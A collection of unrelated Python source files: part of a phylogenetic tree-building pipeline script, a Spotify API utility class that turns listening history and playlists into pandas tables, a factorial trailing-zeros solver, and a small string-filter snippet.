    """Return the primary distance-matrix filename for *basename*."""
    extensions = conf["distext"]
    return basename + extensions[-1]
def getDistFiles(conf, basename):
    """Return *basename* combined with every configured distance extension."""
    names = []
    for ext in conf["distext"]:
        names.append(basename + ext)
    return names
def getTreeFile(conf, basename):
    """Return the output tree filename for *basename*."""
    tree_ext = conf["treeext"][-1]
    return basename + tree_ext
def getUserTreeFile(conf, basename):
    """Return the user-supplied tree filename for *basename*.

    NOTE(review): assumes conf["usertreeext"] is a string; callers are
    expected to guard the None default (see getUserTree).
    """
    user_ext = conf["usertreeext"]
    return basename + user_ext
def getLabelFile(conf, basename):
    """Return the label filename for *basename*.

    Labels are taken from the alignment file, so this is simply the
    alignment filename (last configured alignment extension).
    """
    return basename + conf["alignext"][-1]
def getUserTree(conf, basename):
    """Return the user-specified topology for *basename*.

    If a user-tree extension was configured, read the tree from the matching
    file; otherwise fall back to the preloaded tree in conf["usertree"].

    NOTE(review): the option table does not define a "usertree" key, so the
    fallback branch may raise KeyError — confirm callers populate it.
    """
    # identity comparison ("is not None") is the correct idiom, not "!= None"
    if conf["usertreeext"] is not None:
        return treelib.read_tree(getUserTreeFile(conf, basename))
    else:
        return conf["usertree"]
def getFileType(conf, infile):
    """Determine the file type of 'infile'.

    Returns a (filetype, basename) pair where filetype is one of "fasta",
    "align", "tree", "dist" and basename is *infile* with the matched
    extension stripped.

    Raises ValueError when no configured extension matches.
    """
    # check extension lists in fixed priority order: fasta, align, tree, dist
    for filetype, extkey in (("fasta", "fastaext"),
                             ("align", "alignext"),
                             ("tree", "treeext"),
                             ("dist", "distext")):
        for ext in conf[extkey]:
            if infile.endswith(ext):
                return filetype, util.replace_ext(infile, ext, "")

    # bug fix: raising a plain string is illegal in modern Python
    # (string exceptions were removed); raise a real exception type
    raise ValueError("unknown file type '%s'" % infile)
def checkFamilySize(conf, size, filename):
    """Return True if *size* is within [minsize, maxsize].

    Otherwise report the skipped file on stdout and return False.
    """
    if size < conf["minsize"] or size > conf["maxsize"]:
        # fix: the Python-2-only print statement breaks under Python 3;
        # print() with a single pre-formatted argument works in both.
        print("skipping '%s'; family size %d outside [%d, %d]" %
              (filename, size, conf["minsize"], conf["maxsize"]))
        return False
    return True
def getDataFiles(conf, infile):
    """Map *infile* to its companion filenames.

    Returns (fastafile, alignfile, distfile, labelfile, treefile).  The slot
    that *infile* itself fills keeps the input path; the fasta slot (and,
    when *infile* is a distance matrix, the align slot) is None when the
    corresponding extension list is not configured.  The label file is
    reset to None when it does not exist on disk.
    """
    infileType, basename = getFileType(conf, infile)

    # fasta: the input itself, or derived from basename when configured
    if infileType == "fasta":
        fastafile = infile
    elif "fastaext" in conf:
        fastafile = getFastaFile(conf, basename)
    else:
        fastafile = None

    # align: the input itself, derived, or (dist input only) optional
    if infileType == "align":
        alignfile = infile
    elif infileType == "dist" and "alignext" not in conf:
        alignfile = None
    else:
        alignfile = getAlignFile(conf, basename)

    distfile = infile if infileType == "dist" else getDistFile(conf, basename)
    treefile = infile if infileType == "tree" else getTreeFile(conf, basename)

    labelfile = getLabelFile(conf, basename)
    if not os.path.exists(labelfile):
        labelfile = None

    return fastafile, alignfile, distfile, labelfile, treefile
def run(conf, infile):
    """Process one input file: resolve companion files, log them, and build
    a least-square-error tree from the distance matrix.

    Always returns True; failures surface as exceptions.
    """
    # basename (input path minus its extension) names the output tree below
    infileType, basename = getFileType(conf, infile)
    fastafile, alignfile, distfile, labelfile, treefile = \
        getDataFiles(conf, infile)

    # log what was resolved
    for tag, name in (("fasta:", fastafile),
                      ("align:", alignfile),
                      ("dist: ", distfile),
                      ("label:", labelfile),
                      ("tree: ", treefile)):
        util.logger(tag, name)

    # time the reconstruction
    timer = util.Timer()
    timer.start()

    dist2tree(conf, distfile, labelfile, basename)

    runtime = timer.stop()
    return True
def dist2tree(conf, distfile, labelfile, basename):
    """Fit least-square-error branch lengths onto the user topology using
    the distance matrix in *distfile*, then write the resulting tree.

    Families whose size is outside [minsize, maxsize] are skipped.

    Raises ValueError when no user tree is available ('lse' requires a
    fixed topology).
    """
    labels, mat = phylip.read_dist_matrix(distfile)
    treefile = getTreeFile(conf, basename)
    usertree = getUserTree(conf, basename)

    # check family size
    if not checkFamilySize(conf, len(labels), distfile):
        return

    # prefer sequence names from the label (alignment) file when present
    if labelfile is not None:
        labels = fasta.read_fasta(labelfile).keys()

    # NOTE(review): this timer is started but never stopped/reported —
    # presumably leftover; kept to preserve behavior.
    timer = util.Timer()
    timer.start()

    if usertree is None:
        # bug fix: raising a plain string is illegal in modern Python;
        # use a real exception type
        raise ValueError("Must supply usertree with 'lse'")

    # fits branch lengths in place on usertree (return value was unused)
    phylo.least_square_error(usertree, mat, labels, weighting=False)

    tree = usertree
    tree.write(treefile)
def main(conf):
    """Run every requested input file through the reconstruction pipeline.

    Inputs come from the positional arguments (conf["REST"]) and, with the
    --stdin flag, one filename per line on standard input.  Returns 0.
    """
    # copy so the option structure itself is never mutated
    files = list(conf["REST"])
    if conf["stdin"]:
        files.extend(line.rstrip() for line in sys.stdin)

    util.tic("phyloall")
    for f in files:
        run(conf, f)
    util.toc()

    return 0

if __name__ == "__main__":
    sys.exit(main(conf))
|
import spotipy.util as util
import pandas as pd
import spotipy
from datetime import datetime
from time import sleep
class SpotifyUtil:
    """
    Utility class for accessing Spotify API
    """
    # NOTE(review): leading indentation was stripped from this dump; the
    # nesting below is reconstructed from statement order — confirm against
    # the original file.

    # Maps a spotipy client method name to the parser method (defined below)
    # that converts its JSON response into a DataFrame.
    query_dict = {
        "current_user_recently_played": "parse_songplays",
        "current_user_top_artists": "parse_top_artists",
        "current_user_top_tracks": "parse_tracks",
        "current_user_playlists": "parse_playlists",
        "playlist_items": "parse_playlists_items",
    }

    def __init__(self, username, client_id, client_secret, redirect_uri):
        # Spotify app credentials and the account to act as.
        self.username = username
        self.client_id = client_id
        self.client_secret = client_secret
        self.redirect_uri = redirect_uri
        # Placeholder; replaced by an authenticated spotipy.Spotify client
        # in setup().
        self.session = ""

    def setup(self, scope):
        """
        Setup Spotify connection and authorization
        """
        print("-- Initializing Spotify connection SETUP")
        token = self.get_token(scope=scope)
        print("token is ready!")
        session = self.get_connection(token=token)
        self.session = session
        # brief pause before first use — presumably to let auth settle
        sleep(1)
        print(f"connection and user are ready! {self.session}")

    def get_spotify_data(self, query, limit=50, time_range="long_term"):
        """
        Retrieves data from Spotify
        """
        # only the top-tracks endpoint accepts a time_range argument
        if query == "current_user_top_tracks":
            json = getattr(self.session, query)(limit=limit, time_range=time_range)
        else:
            json = getattr(self.session, query)(limit=limit)
        # dispatch to the parser registered for this query
        self.df = getattr(self, self.query_dict[query])(data=json)
        if query == "current_user_playlists":
            # additionally fetch the items of every playlist found
            items = []
            for index in self.df.index.tolist():
                json_items = getattr(self.session, "playlist_items")(
                    limit=100, playlist_id=self.df.at[index, "playlist_id"]
                )
                if len(json_items['items']) > 0:
                    playlist_items, columns = getattr(
                        self, self.query_dict["playlist_items"]
                    )(data=json_items, playlist_id=self.df.at[index, "playlist_id"])
                    items.append(playlist_items)
            # NOTE(review): pd.concat raises on an empty list — assumes at
            # least one playlist has items; confirm.
            df_items = pd.concat(items, ignore_index=True)
            return self.df, df_items
        return self.df

    def get_token(self, scope):
        """
        Obtains the token for user authorization
        """
        token = util.prompt_for_user_token(
            username=self.username,
            scope=scope,
            client_id=self.client_id,
            client_secret=self.client_secret,
            redirect_uri=self.redirect_uri,
        )
        return token

    def get_connection(self, token):
        """
        Sets up the Spotify Connection
        """
        spotify = spotipy.Spotify(auth=token)
        return spotify

    def parse_json(self, data, columns, *args, **kwargs):
        """
        Parses response data in JSON format
        """
        # optionally descend into a sub-key of the payload (e.g. "items")
        if not (kwargs.get("result_key") == None):
            data = data[kwargs["result_key"]]
        df = pd.json_normalize(data).reset_index()
        # drop rows without an id (e.g. unavailable tracks)
        if "id" in columns:
            df = df.dropna(subset = ["id"])
        # make the positional index 1-based (used as rank columns)
        df["index"] = df["index"] + 1
        # keep only the requested source columns and rename them
        df = df[columns.keys()].rename(columns=columns)
        return df

    def parse_primary_other(self, parse_list=[]):
        """
        Parses primary and other values for lists
        """
        # copy so the caller's list (and the shared default) is not mutated
        parse_list = parse_list.copy()
        try:
            primary = parse_list.pop(0)
        except IndexError:
            primary = None
        others = ", ".join(parse_list)
        return primary, others

    def parse_songplays(self, data, columns=None):
        """
        Parses songplays data of user
        """
        # default column mapping for the recently-played payload
        if columns is None:
            columns = {
                "index": "songplays_id",
                "track.id": "track_id",
                "track.name": "track_name",
                "track.artists": "artists",
                "track.duration_ms": "track_duration",
                "track.explicit": "track_is_explicit",
                "track.popularity": "track_popularity",
                "played_at": "track_played_at",
                "track.album.id": "album_id",
                "track.album.name": "album_name",
                "track.album.release_date": "album_release_year",
                "track.album.type": "album_type",
            }
        songplays = self.parse_json(data=data, columns=columns, result_key="items")

        # Parse artists
        def parse_artist(artists):
            # parse primary and other artists
            artist_name, artist_name_others = self.parse_primary_other(
                [artist["name"] for artist in artists]
            )
            artist_id, artist_id_others = self.parse_primary_other(
                [artist["id"] for artist in artists]
            )
            return artist_name, artist_name_others, artist_id, artist_id_others

        (
            songplays["artist_name"],
            songplays["artist_name_others"],
            songplays["artist_id"],
            songplays["artist_id_others"],
        ) = zip(*songplays["artists"].apply(parse_artist))

        # Get release year
        def parse_year(album_release_year):
            try:
                year = datetime.strptime(album_release_year, "%Y-%m-%d").year
            except (ValueError, NameError):
                # fall back to year-only release dates
                # NOTE(review): catching NameError looks unintended (nothing
                # here raises it) — confirm whether TypeError was meant.
                year = datetime.strptime(album_release_year, "%Y").year
            return year

        songplays["album_release_year"] = songplays["album_release_year"].apply(
            lambda x: parse_year(x)
        )

        # Convert timestamp
        try:
            songplays["track_played_at"] = songplays["track_played_at"].apply(
                lambda x: pd.Timestamp(x).strftime("%Y-%m-%d %H:%M:%S")
            )
        except KeyError:
            # column absent when called for top tracks / playlist items
            pass

        # Convert track duration (milliseconds -> minutes)
        songplays["track_duration"] = songplays["track_duration"].apply(
            lambda x: x / 60000
        )

        # Get features
        def get_features(key, method, df, columns, result_key=None):
            # Spotify bulk endpoints cap ids per request (chunks of 50)
            for values_list in self.split_in_chunks(df[key].values.tolist(), 50):
                features = getattr(self.session, method)(values_list)
                features_df = self.parse_json(
                    data=features, columns=columns, result_key=result_key
                )
                features_df.drop_duplicates(subset=key, inplace=True)
                # NOTE(review): merging inside the chunk loop duplicates the
                # feature columns when more than one chunk is processed —
                # confirm intended behavior for >50 unique ids.
                df = df.merge(features_df, how="left", on=key)
            return df

        # Get track features
        track_features_columns = {
            "id": "track_id",
            "danceability": "track_danceability",
            "energy": "track_energy",
            "key": "track_key",
            "loudness": "track_loudness",
            "mode": "track_mode",
            "speechiness": "track_speechiness",
            "acousticness": "track_acousticness",
            "instrumentalness": "track_instrumentalness",
            "liveness": "track_liveness",
            "valence": "track_valence",
        }
        songplays = get_features(
            key="track_id",
            method="audio_features",
            df=songplays,
            columns=track_features_columns,
        )

        # Get artist features
        artist_features_columns = {
            "id": "artist_id",
            "genres": "artist_genres",
            "popularity": "artist_popularity",
            "followers.total": "artist_followers",
        }
        songplays = get_features(
            key="artist_id",
            method="artists",
            df=songplays,
            columns=artist_features_columns,
            result_key="artists",
        )

        # Parse genres
        if "artist_genres" in songplays.columns:
            (songplays["artist_genre"], songplays["artist_genre_others"]) = zip(
                *songplays["artist_genres"].apply(self.parse_primary_other)
            )
            songplays.drop(columns=["artist_genres", "artists"], axis=1, inplace=True)
        return songplays

    def parse_top_artists(self, data):
        """
        Parses top artists of user
        """
        columns = {
            "index": "artist_rank",
            "id": "artist_id",
            "name": "artist_name",
            "genres": "artist_genres",
            "popularity": "artist_popularity",
            "followers.total": "artist_followers",
        }
        # NOTE(review): debug prints left in place
        print(columns)
        top_artists = self.parse_json(data=data, columns=columns, result_key="items")
        print(f"top_artists {top_artists}")
        # Parse genres
        (top_artists["artist_genre"], top_artists["artist_genre_others"]) = zip(
            *top_artists["artist_genres"].apply(self.parse_primary_other)
        )
        top_artists.drop(columns=["artist_genres"], axis=1, inplace=True)
        return top_artists

    def parse_tracks(self, data, playlist_id=None):
        """
        Parses top tracks of user
        """
        columns = {
            "index": "track_rank",
            "id": "track_id",
            "name": "track_name",
            "artists": "artists",
            "duration_ms": "track_duration",
            "explicit": "track_is_explicit",
            "popularity": "track_popularity",
            "album.id": "album_id",
            "album.name": "album_name",
            "album.release_date": "album_release_year",
            "album.type": "album_type",
        }
        # NOTE(review): "playlist_id" is not a column of the raw track JSON,
        # so parse_json's column selection would likely fail on this path;
        # parse_playlists_items currently calls without playlist_id — confirm.
        if playlist_id:
            columns["playlist_id"] = playlist_id
        # reuse the songplays pipeline with the track-level column mapping
        top_tracks = self.parse_songplays(data=data, columns=columns)
        return top_tracks

    def parse_playlists(self, data):
        """
        Parses playlists of user
        """
        columns = {
            "index": "playlist_rank",
            "id": "playlist_id",
            "name": "playlist_name",
            "tracks.total": "playlist_size",
            "public": "playlist_is_public",
            "collaborative": "playlist_is_collaborative",
        }
        playlists = self.parse_json(data=data, columns=columns, result_key="items")
        return playlists

    def parse_playlists_items(self, data, playlist_id):
        """
        Parses items of a playlist of user
        """
        print(f"playlist_id: {playlist_id}")
        # unwrap the nested "track" objects so parse_tracks can handle them
        tmp_list = [item["track"] for item in data["items"]]
        data["items"] = tmp_list
        playlist_items = self.parse_tracks(data=data)
        playlist_items["playlist_id"] = playlist_id
        columns = playlist_items.columns
        return playlist_items, columns

    def split_in_chunks(self, lst, n):
        # yield successive n-sized slices of lst
        for i in range(0, len(lst), n):
            yield lst[i : i + n]
|
# Source: https://www.acmicpc.net/source/17969385


def factorial_trailing_zeros(n):
    """Return the number of trailing zeros of n!.

    Counts the factors of 2 and of 5 contained in 1..n; the number of
    trailing zeros is the smaller of the two counts (in practice the
    count of 5s, since factors of 2 are more plentiful).
    """
    count = [0] * 2
    for i in range(n, 0, -1):
        while i % 2 == 0:
            count[0] += 1
            i = i // 2
        while i % 5 == 0:
            count[1] += 1
            i = i // 5
    return min(count)


if __name__ == "__main__":
    # original script behavior: read N from stdin, print the answer
    print(factorial_trailing_zeros(int(input())))
|
# Remove every occurrence of "t" from the sample string and print the result.
s = 'string'
ad = "".join(ch for ch in s if ch != "t")
print(ad)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.